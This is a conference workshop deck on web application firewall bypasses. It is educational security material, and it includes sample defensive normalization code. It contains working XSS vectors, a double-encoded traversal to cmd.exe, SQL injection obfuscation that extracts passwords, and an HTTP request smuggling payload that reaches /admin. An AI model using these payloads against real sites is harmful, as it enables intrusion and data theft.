Web Application Firewall Workshop

Presented by Philippe Arteau

Hackfest 2022

About Me

  • Security Engineer at ServiceNow
  • Interested in application security, automation, crypto, ...
  • Open-source developer
    • Find Security Bugs: Static Analysis for Java applications
    • Burp and ZAP Plugins: (Retire.js, CSP Auditor, Reissue Request Scripter, …)

Agenda

  1. What is a WAF?
  2. Alternative Syntax
  3. Encoding
  4. SQL Syntax
  5. Switching Protocol
  6. Request Smuggling

Workshop

What is a WAF?

Definition

  • The purpose of a Web Application Firewall is to filter, monitor, and block HTTP traffic.

  • HTTP traffic can be incoming and/or outgoing

Vendors


Alternative Syntax

Alternative Paths

What is the path to Wordpress's users endpoint?

Source: 6 ways to enumerate WordPress Users

Alternative HTML Tags

<svg/onload=prompt(/XSS/)>
<video onnull=null onmouseover=confirm(1)>

Source: Cloudflare WAF Bypass by Bohdan Korzhynskyi

<dETAILS open onToGgle=a=prompt,a() x>

Source: Akamai WAF Bypass found by @s0md3v

Alternative Keywords

Instead of information_schema.tables, all_tables, sys.sysobjects ...

Alternative table names:

  • information_schema.table_constraints
  • mysql.innodb_table_stats
  • dbo.__MigrationHistory
  • ALL_TAB_STATISTICS

Encoding

Case Mapping

PHP: the i modifier is needed to make the match case-insensitive

preg_match("/union.*select/i", $input)

Python: re.IGNORECASE

import re
re.compile("<[a-z]", re.IGNORECASE)

[NC] in .htaccess (Apache HTTP Server)

RewriteCond %{QUERY_STRING} \bwp/v2/users\b [NC]

URL Encoding

Path encoded

http://server.com/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

HTML double encoded

%253Cscript%253Econfirm()%253C%252Fscript%253E

HTML/XSS and Encoding

Depending on the context, different encoding can be used.

Encoding type                              Example for <
Named XML/HTML entities                    &lt;
Numeric XML/HTML entities (hex / decimal)  &#x3C; / &#60;
Slash escaped                              \x3C, \074, \74
String.fromCharCode                        String.fromCharCode(60)

Unicode Encoding

UTF-8 is not the only way to encode Unicode characters

  • UTF-7 (+ADw-script+AD4-alert(123)+ADw-+AC8-script+AD4-) ⚠️
  • UTF-16LE (00 3c 00 62 00 6f 00 6f 00 6b)
  • UTF-16BE
  • UTF-32…

⚠️: No longer supported by many browsers and frameworks.

More info: Unicode vulnerabilities that could byͥte you

Unicode Normalization

Character   Code point
＜           U+FF1C
<           U+003C

SQL query:

INSERT INTO ContentTable VALUES (…,'<img src=…')

Content when fetched:

<img src=x onerror=prompt(1)>
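The same folding applied as a defensive check, written for this page as an added example rather than the workshop's own code: canonicalize() repeatedly peels URL, HTML-entity and slash escapes (covering the double-encoded and HTML/XSS encoding slides above) and then NFKC-normalizes, so a fullwidth ＜ (U+FF1C) is matched as <. The function and rule names are assumptions for this demo.

```python
import html
import re
import unicodedata
from urllib.parse import unquote

# Assumed helper names for this demo (not from the workshop): canonicalize(), looks_like_html_tag().
_JS_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})")


def _unescape_js(s: str) -> str:
    """Resolve \\xHH, \\uHHHH and octal \\NNN escapes (the 'slash escaped' row of the table)."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 16))
        return chr(int(m.group(3), 8))
    return _JS_ESCAPE.sub(repl, s)


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Peel encoding layers until the value stops changing, then NFKC-normalize it.

    Repeating the decode is what makes %253C (-> %3C -> <) visible; a single pass
    would still see '%3C'. NFKC maps compatibility characters such as U+FF1C
    (fullwidth '<') onto U+003C, the same folding the database/application did in
    the 'Unicode Normalization' slide, so the rule sees what the browser will see.
    """
    current = value
    for _ in range(max_rounds):
        decoded = unquote(current)          # %3C -> <
        decoded = html.unescape(decoded)    # &lt; &#60; &#x3C; -> <
        decoded = _unescape_js(decoded)     # \x3C \074 \74 -> <
        if decoded == current:
            break
        current = decoded
    return unicodedata.normalize("NFKC", current)


_TAG_START = re.compile(r"<\s*(script|img|svg|video|details)\b", re.IGNORECASE)


def looks_like_html_tag(value: str) -> bool:
    """Run the tag rule on the canonical form rather than on the raw parameter."""
    return _TAG_START.search(canonicalize(value)) is not None
```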

Exercises

Time for some action...

Open the following URL and see if you can find the bypasses:
Live instance (only for Hackfest)

SQL Injection

SQLi Whitespace alternatives

DBMS         ASCII characters (in hex)
MySQL 5      09, 0A, 0B, 0C, 0D, A0, 20
SQLite       0A, 0D, 0C, 09, 20
MSSQL        01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, [...]
PostgreSQL   0A, 0D, 0C, 09, 20
Oracle 11g   00, 0A, 0D, 0C, 09, 20

SQLi Obfuscation Patterns

/*Comments*/

SELECT/**/name/**/FROM/**/users/**/WHERE/**/1=1

MSSQL [Square brackets]

SELECT"name"FROM[sys.databases]WHERE"id"=1

Oracle

SELECT 0x7461626c655f6e616d65 FROM all_tab_tables

Scientific Expression in MySQL

Using notation such as 1.e followed by a non-numeric character...

1.e(ascii 1.e(substring(1.e(select password from users [...]

This is how MySQL/MariaDB will interpret it:

(ascii (substring((select password from users [...]

Source: A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection by Marc-Olivier Bergeron
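A normalization step that covers the whitespace table, the comment and bracket obfuscations and the 1.e quirk above, written for this page as an added example (not a WAF product's code); the function names are assumed. It also keeps the content of MySQL /*! */ versioned comments, which the slides do not mention but which the server executes, so dropping them would hide tokens.

```python
import re

# Constructed example: normalize_sql() and has_sqli_shape() are assumed names for this
# demo, not functions from the workshop or from any WAF product.

# MySQL 5 accepts these bytes as token separators (the whitespace table above).
_MYSQL_WS = re.compile(r"[\x09\x0a\x0b\x0c\x0d\xa0\x20]+")
# /*! ... */ is executed by MySQL, so its content must be kept; plain /* ... */ is dropped.
_VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.DOTALL)
_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
# [bracketed] (MSSQL) and "double-quoted" identifiers glued to the keywords around them.
_QUOTED_IDENT = re.compile(r'\[([^\]]+)\]|"([^"]+)"')
# "1.e" directly followed by a non-numeric character: MySQL/MariaDB ignore the prefix
# and keep parsing, as the slide describes; modelled here as a plain text rewrite.
_SCI_PREFIX = re.compile(r"\b1\.e(?=[^0-9+\-])")


def normalize_sql(query: str) -> str:
    """Canonical text that a keyword rule should inspect instead of the raw query."""
    q = _VERSIONED_COMMENT.sub(r" \1 ", query)
    q = _COMMENT.sub(" ", q)                 # /**/ still separates tokens: keep one space
    q = _SCI_PREFIX.sub("", q)               # 1.e(ascii 1.e(substring( -> (ascii (substring(
    q = _QUOTED_IDENT.sub(lambda m: " %s " % (m.group(1) or m.group(2)), q)
    q = _MYSQL_WS.sub(" ", q)                # tab, VT, FF, CR, NBSP ... -> one space
    return q.strip().lower()


# Two coarse shapes, matched on the normalized text only.
_SHAPES = [re.compile(r"\bunion\b.*\bselect\b"), re.compile(r"\bselect\b.*\bfrom\b")]


def has_sqli_shape(query: str) -> bool:
    """True when the canonical form of the query matches one of the shapes."""
    return any(rule.search(normalize_sql(query)) for rule in _SHAPES)
```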

Exercise

Time to bypass one of the most robust WAFs, ModSecurity!

Live instance (only for Hackfest)

Switching Protocol

WebSocket

WebSocket handshake

[WebSocket sequence diagram]

WebSocket Passthrough

In order to work:

  • You need to either:
    • Control the status code of ONE page
    • Deploy a custom application at a given path
  • Proxy must honor the 101 response (Switching Protocols)
  • WAF does not inspect WebSocket communication

HTTP/2 Cleartext

HTTP/2 Cleartext (h2c) upgrade handshake

[h2c sequence diagram]

HTTP/2 Cleartext Passthrough

In order to work:

  • The backend application needs to support H2C
  • Proxy must honor the 101 response
  • WAF does not look at HTTP/2 Cleartext requests.

Exercise

New exercises for the fourth block!

Live instance (only for Hackfest)

Request Smuggling

HTTP/1.1 CL.CL

The proxy sees the first Content-Length header,

HTTP/1.1 CL.CL

while the backend sees the last Content-Length header.

HTTP/1.1 CL.TE

Transfer-Encoding: chunked

POST /index.php HTTP/1.1
Host: myapp.com
Transfer-Encoding: chunked

5\r\n
Hello\r\n
8\r\n
Hackfest\r\n
B\r\n
Conference!\r\n
0\r\n
\r\n

HTTP/1.1 CL.TE

POST / HTTP/1.1
Host: localhost
Content-Length: 45
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
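The CL.TE request above parsed both ways, as an added example that is not the workshop's code: one parser frames on Content-Length and sees a single request, the other frames on chunked encoding and sees a second GET /admin after the 0-size chunk; reject_ambiguous() is the defensive rule a proxy should apply before forwarding. Function names and the spelled-out sample are assumptions for this demo.

```python
# Constructed example: the two parsers, reject_ambiguous() and the SMUGGLED sample are
# written for this demo and are not code from the workshop or from any proxy.
CRLF = b"\r\n"

# The CL.TE request from the slide above, with its 45-byte body spelled out.
SMUGGLED = (
    b"POST / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 45\r\n"
    b"Transfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n"
)


def _split_head(raw: bytes):
    # Returns (request line, {lowercased header name: value}, offset where the body starts).
    head = raw.partition(CRLF + CRLF)[0]
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, len(head) + 4


def requests_seen_by_cl_parser(raw: bytes) -> list:
    """A front end that frames on Content-Length: the body ends after that many bytes."""
    seen = []
    while raw:
        line, headers, body_start = _split_head(raw)
        seen.append(line.decode())
        raw = raw[body_start + int(headers.get(b"content-length", b"0")):]
    return seen


def requests_seen_by_te_parser(raw: bytes) -> list:
    """A backend that frames on Transfer-Encoding: the body ends at the 0-size chunk."""
    seen = []
    while raw:
        line, headers, pos = _split_head(raw)
        seen.append(line.decode())
        if headers.get(b"transfer-encoding") == b"chunked":
            size = -1
            while size != 0:
                size_end = raw.index(CRLF, pos)
                size = int(raw[pos:size_end], 16)
                pos = size_end + 2 + size + 2     # chunk data plus its trailing CRLF
        else:
            pos += int(headers.get(b"content-length", b"0"))
        raw = raw[pos:]
    return seen


def reject_ambiguous(headers: dict) -> bool:
    """Defensive rule: a message carrying both framing headers is never forwarded."""
    return b"content-length" in headers and b"transfer-encoding" in headers
```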

Conclusion

Conclusion

  • Think about transformation
    • Encoding, Replacement, Nested Encoding
  • Parser implementation differences
    • Application vs Proxy vs Security controls
  • WAF is not a silver bullet
    • Using a WAF is not bad either! (Additional safety)

There is more...

The End!

Social

Slides